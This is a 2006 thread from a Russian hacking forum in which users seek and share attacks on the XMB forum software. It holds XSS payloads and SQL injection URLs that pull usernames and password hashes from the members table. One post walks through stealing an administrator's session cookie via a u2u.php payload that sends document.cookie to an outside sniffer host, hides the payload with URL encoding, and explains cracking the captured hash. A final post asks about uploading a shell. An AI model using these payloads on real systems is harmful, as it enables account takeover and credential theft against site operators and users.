Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Есть ли уязвимости у Xmb ? (https://forum.antichat.xyz/showthread.php?t=21641)

netzzz 12.07.2006 13:17

Есть ли уязвимости у Xmb ?
 
Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8
если не увидел чего .. ткните носом

Nova 12.07.2006 13:19

Форум просто не сильнопопулярный по этому особо нечего и нет....
Я поищу если что найду стоящие то выложу....

Тебя какие версий интересуют ?

j0nathan 14.07.2006 05:46

[CODE]Программа: XMB 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

Программа: XMB 1.9.3, возможно более ранние версии
Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения

Программа: XMB Forum 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/u2u.php?action=send&username=
Код:


Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518)
Опасность: Средняя

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>

http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);
</%73cript>

http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x


http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt
(document.cookie);</%73cript>

text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]


text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2


 http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL
SELECT NULL,NULL,username FROM xmb_members WHERE uid=1
LIMIT 1/*

http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT
 NULL,NULL,password FROM xmb_members WHERE uid=1
LIMIT 1/*

Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta
Опасность: Средняя

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.

Пример/Эксплоит:

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9

http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,
1%20LIMIT%201%20/*

http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>

http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>

http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>

htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>

http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>

Программа: XMB Forum 1.9.1
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей.

Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Это ещё не все :D
Код:

http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
в иксМБ много иксс! Можно спокойно мд5 угнать :)

Dracula4ever 14.07.2006 07:08

на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .

j0nathan 14.07.2006 08:28

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения


А какой запрос делать чтобы хэш увидеть у первого id ??

netzzz 14.07.2006 09:40

вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу

j0nathan 14.07.2006 11:43

Возможно нет вслудуйщей мне кажеться залатают дыру

netzzz 14.07.2006 12:15

да кстати версия которая меня интерисует 1.9.5
а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации

j0nathan 14.07.2006 13:47

Зарегайся на форуме и проверь xss
Код:

http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script>
если алерт пашет то пиши в ПМ админу типа чё за косяк
Код:

http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Есть в инете специальные скрипты
но можно немного скрипт сниффа приныкать но можно лучше сныкать
Код:

http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
Админ по ссылке зайдёт и ты его хэш забираешь и разшифровываешь :) Кстати ПС
тебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог
http://antichat.ru/sniff/log.php
Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет :) Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3

netzzz 17.07.2006 10:32

в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?


Время: 03:49